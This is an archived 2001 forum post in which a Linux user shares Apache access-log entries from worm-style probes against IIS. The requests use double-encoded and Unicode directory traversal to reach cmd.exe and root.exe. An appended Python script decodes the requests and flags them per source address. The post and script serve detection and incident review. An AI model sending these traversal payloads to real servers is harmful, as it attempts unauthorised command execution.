Full Discussion: /var/log/httpd/access_log
Special Forums Cybersecurity /var/log/httpd/access_log Post 7760 by eddie on Monday 1st of October 2001 06:41:42 PM
10-01-2001
/var/log/httpd/access_log

Yesterday I happened to check /var/log/httpd/access_log and found some funny things like these,

209.127.62.159 - - [30/Sep/2001:21:23:09 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
209.127.62.159 - - [30/Sep/2001:21:23:10 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
209.127.62.159 - - [30/Sep/2001:21:23:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
209.127.62.159 - - [30/Sep/2001:21:23:14 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265

Obviously, the access treated my machine like NT/IIS. As we can see from the log, it was trying harder and harder. If I had not shut down port 80, it would have created hundreds of lines in the log file. I also checked the logs of the past 3 months; there are about 200 tries of this kind from various ranges of IP addresses.

I think this is apparently a virus attack. Has anybody here ever found such a log? I just dialed up to the Internet, the connection lasted for about 30 minutes, and I got this attack. I would keep my httpd closed. Thank god, my system is Linux, not NT.

Last edited by eddie; 10-01-2001 at 07:50 PM..
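The kind of check the post describes doing by eye can be scripted. This is an added example, not part of the original post: it parses Common Log Format lines, percent-decodes each request target repeatedly so the `%255c` double encoding becomes a visible backslash, and counts flagged requests per source address. The indicator names, function names and the benign sample line are assumptions made for the illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Common Log Format: host ident user [time] "method target proto" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)$')

# Indicators taken from the request lines quoted in the post.
INDICATORS = {
    "cmd.exe": re.compile(r"cmd\.exe", re.I),
    "root.exe": re.compile(r"root\.exe", re.I),
    "traversal": re.compile(r"\.\.[\\/]"),
}

def decode_fully(target, max_rounds=3):
    """Percent-decode repeatedly so %255c -> %5c -> backslash becomes visible."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(target, encoding="latin-1")
        if decoded == target:
            break
        target, rounds = decoded, rounds + 1
    return target, rounds

def classify(line):
    """Return host, status and indicator tags for one line, or None if unparsable."""
    m = CLF.match(line.strip())
    if not m:
        return None
    host, _when, _method, target, status, _size = m.groups()
    decoded, rounds = decode_fully(target)
    tags = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
    if rounds > 1:
        tags.append("double-encoded")
    return {"host": host, "status": int(status), "tags": tags}

def summarize(lines):
    """Count flagged requests per source address."""
    hits = Counter()
    for rec in map(classify, lines):
        if rec and rec["tags"]:
            hits[rec["host"]] += 1
    return hits

SAMPLE = [  # first three lines are from the post; the last is a constructed benign request
    '209.127.62.159 - - [30/Sep/2001:21:23:09 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210',
    '209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218',
    '209.127.62.159 - - [30/Sep/2001:21:23:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232',
    '192.0.2.10 - - [30/Sep/2001:21:25:00 -0400] "GET /index.html HTTP/1.0" 200 1024',
]
```

Every flagged request in the post returned 404; a flagged request logged with a 2xx status is the case that needs follow-up.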
 
